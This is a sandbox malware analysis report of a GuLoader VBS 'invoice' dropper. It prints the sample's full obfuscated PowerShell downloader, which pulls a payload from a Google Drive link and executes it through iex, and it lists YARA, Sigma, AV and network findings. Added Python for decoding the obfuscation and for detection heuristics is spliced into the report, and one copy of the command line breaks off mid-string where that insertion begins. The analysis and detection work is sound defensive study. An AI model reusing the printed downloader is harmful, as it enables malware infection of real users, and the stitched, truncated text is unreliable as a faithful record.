Windows Analysis Report
FACTURA24021151 - BP.vbs

Overview

General Information

Sample name: FACTURA24021151 - BP.vbs
Analysis ID: 1427938
MD5: c782d407c65fb588872ca0d46bf40d75
SHA1: 3618270c1dadde1fd9b0b9c9a93148317f814628
SHA256: 83d1ada429755f86e1468a30957b910641d112d83f44390bcfa38d5c9210d244
Tags: GuLoader, vbs

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5580 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. 
';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. 
');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF .ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere (Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter ' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr ') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere (Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa 
olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[ lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2 Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3 Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2696 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
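Every string the PowerShell stage above needs is hidden behind Fjter: the function builds the method name Substring from 'Substrin'+'g', then keeps one character out of every six, starting at offset 5 and stopping one short of the end (so the last 6-byte chunk of each literal is padding). Jardiniere dot-sources its argument through $Lflaskernes, which decodes to iex, i.e. Invoke-Expression. The Python below is an added example, not part of this report or of the sample; it re-implements that selection rule and runs it over the Fjter literals copied verbatim from the command line in the process tree. Two of the results can be cross-checked against the rest of the report: $Exencephalus decodes to the Google Drive download URL seen in the HTTP traffic, and $Nonpainter decodes to the exact command line of the cmd.exe child (PID 2696). The Mozilla/5.0 user-agent literal ($Heltalsdivisions) is deliberately left out: as rendered on this page one character is missing from it (most likely a run of spaces collapsed by the HTML report), so its 6-byte alignment is lost right after "Mozilla/5.0 " and the page copy does not decode; the real header value is visible in the HTTP requests below.

```python
import re

# Fjter literals copied verbatim from the powershell.exe command line in the
# process tree above. The Mozilla/5.0 literal is omitted: one character of it
# is missing in the rendered report, which breaks the 6-byte alignment.
CMDLINE_EXCERPT = r"""$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';"""

# One `$name = Fjter '<blob>'` assignment; the blobs never contain a quote.
FJTER_CALL = re.compile(r"\$(\w+)\s*=\s*Fjter\s+'([^']*)'")


def fjter(blob: str, start: int = 5, step: int = 6, width: int = 1) -> str:
    """Python port of the sample's Fjter function.

    The PowerShell reads (with $Kummelnweaving = 1):
        For($i=5; $i -lt $s.Length-1; $i+=6){ $out += $s.Substring($i, 1) }
    so it keeps one character out of every six, beginning at offset 5, and
    stops before the last character; the final 6-byte chunk of every literal
    is therefore pure padding and never contributes to the output.
    """
    return "".join(blob[i:i + width] for i in range(start, len(blob) - width, step))


def decode_assignments(cmdline: str) -> dict[str, str]:
    """Map every Fjter-wrapped variable in the command line to its plaintext."""
    return {name: fjter(blob) for name, blob in FJTER_CALL.findall(cmdline)}


def main() -> None:
    for name, value in decode_assignments(CMDLINE_EXCERPT).items():
        print(f"${name:<16} = {value!r}")


if __name__ == "__main__":
    main()
```

Running it prints five variables: $Maskinkoderne is the header name User-Agent, $Exencephalus the first-stage URL, $typhloempyema the redirection operator ">", $Lflaskernes the alias iex, and $Nonpainter the cmd.exe one-liner that resolves %appdata% for the drop path. The same decoder applies to the later Fjter literals in the command line, but only where the rendered text preserved every character; a literal whose decoded length is not a whole number of expected tokens has been damaged in transit, as the user-agent string was here.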
No configs have been found
Source: Process Memory Space: powershell.exe PID: 5960
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x35f0:$b2: ::FromBase64String(
  • 0x3635:$b2: ::FromBase64String(
  • 0x367b:$b2: ::FromBase64String(
  • 0x36c2:$b2: ::FromBase64String(
  • 0x370a:$b2: ::FromBase64String(
  • 0x3753:$b2: ::FromBase64String(
  • 0x379d:$b2: ::FromBase64String(
  • 0x37e8:$b2: ::FromBase64String(
  • 0x3834:$b2: ::FromBase64String(
  • 0x3881:$b2: ::FromBase64String(
  • 0x38cf:$b2: ::FromBase64String(
  • 0x391e:$b2: ::FromBase64String(
  • 0x396e:$b2: ::FromBase64String(
  • 0x39bf:$b2: ::FromBase64String(
  • 0x3a11:$b2: ::FromBase64String(
  • 0x3a64:$b2: ::FromBase64String(
  • 0x3ab8:$b2: ::FromBase64String(
  • 0x3b0d:$b2: ::FromBase64String(
  • 0x3b63:$b2: ::FromBase64String(
  • 0x3cae:$b2: ::FromBase64String(
  • 0x687ad:$b2: ::FromBase64String(
Source: amsi64_5960.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xe286:$b2: ::FromBase64String(
  • 0xd2a8:$s1: -join
  • 0x6a54:$s4: +=
  • 0x6b16:$s4: +=
  • 0xad3d:$s4: +=
  • 0xce5a:$s4: +=
  • 0xd144:$s4: +=
  • 0xd28a:$s4: +=
  • 0xf6bd:$s4: +=
  • 0xf73d:$s4: +=
  • 0xf803:$s4: +=
  • 0xf883:$s4: +=
  • 0xfa59:$s4: +=
  • 0xfadd:$s4: +=
  • 0xda87:$e4: Get-WmiObject
  • 0xdc76:$e4: Get-Process
  • 0xdcce:$e4: Start-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", ProcessId: 5580, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs", ProcessId: 5580, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. 
UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelReci
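The Sigma rows above (WScript or CScript Dropper, and WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript, as named in the Signatures overview) together with the "Very long command line found" signature reduce to a few checks on a single process-creation event: the parent is wscript.exe or cscript.exe, the child is a shell, and the command line is far longer than anything typed by hand (6742 bytes in this run). The Python below is an added example, not part of this report or of the Sigma rules themselves; it applies those checks, plus two string patterns lifted from the visible command line (a method name assembled piecewise with +=, and a method called through a variable with .Invoke(), which is how the sample hides Substring), to constructed process events modelled on the process tree. The 4096-character threshold is an assumption, and the first sample command line is the genuine prefix from the report padded to the reported size with a placeholder, not the original text.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LONG_CMDLINE_CHARS = 4096  # assumed threshold; this report flagged a 6742-byte command line

# Two patterns taken from the command line in this report:
#   $Bredders130='Substrin';$Bredders130+='g'   -> a method name assembled piecewise
#   $Olericulturally.$Bredders130.Invoke(...)   -> that name used as a method via a variable
PIECEWISE_NAME = re.compile(r"\$\w+\+=\s*'[^']{1,4}'")
INDIRECT_INVOKE = re.compile(r"\.\$\w+\.Invoke\(")


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> list[str]:
    """Names of the checks that fire for one process-creation event, in a fixed order."""
    hits = []
    if _basename(ev.parent_image) in SCRIPT_HOSTS and _basename(ev.image) in SHELLS:
        hits.append("script host spawned a shell")
    if len(ev.command_line) >= LONG_CMDLINE_CHARS:
        hits.append("very long command line")
    if PIECEWISE_NAME.search(ev.command_line) and INDIRECT_INVOKE.search(ev.command_line):
        hits.append("obfuscated method call")
    return hits


def triage(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map PID -> hits for every event that trips at least one check."""
    return {ev.pid: hits for ev in events if (hits := evaluate(ev))}


# Genuine prefix of the powershell.exe command line from the process tree above.
REAL_PREFIX = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"$Kummelnweaving = 1;$Bredders130=\'Substrin\';$Bredders130+=\'g\';'
    'Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;'
    'For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6))'
    '{$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}'
)

# Constructed events modelled on the process tree. The first command line is the
# genuine prefix padded with '#' to the reported size (6742); the padding is
# constructed, not the original text. PID 4242 is a constructed benign event.
SAMPLE_EVENTS = [
    ProcessEvent(5960, r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 REAL_PREFIX + "#" * (6742 - len(REAL_PREFIX))),
    ProcessEvent(2696, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\system32\cmd.exe",
                 r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"'),
    ProcessEvent(4242, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 '"powershell.exe" -NoProfile -Command Get-Date'),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Only PID 5960 is reported, with all three checks firing; the cmd.exe child (PID 2696) trips none of them on its own, which is why a real detection pipeline should also carry the grandparent relationship (wscript.exe -> powershell.exe -> cmd.exe) rather than judge each event in isolation. The two regexes are narrow by design: they describe this sample's construction, not GuLoader in general, and a different build will need different patterns.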
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: FACTURA24021151 - BP.vbs | ReversingLabs: Detection: 23%
Source: FACTURA24021151 - BP.vbs | Virustotal: Detection: 15%
Source: unknown | HTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: drive.google.com
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab=
Source: wscript.exe, 00000000.00000003.2013570328.000001B413981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013924084.000001B4139A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d6441c
Source: wscript.exe, 00000000.00000002.2025723641.000001B413950000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000003.2023391085.000001B4117C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2024986575.000001B411828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021652412.000001B4117B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ens
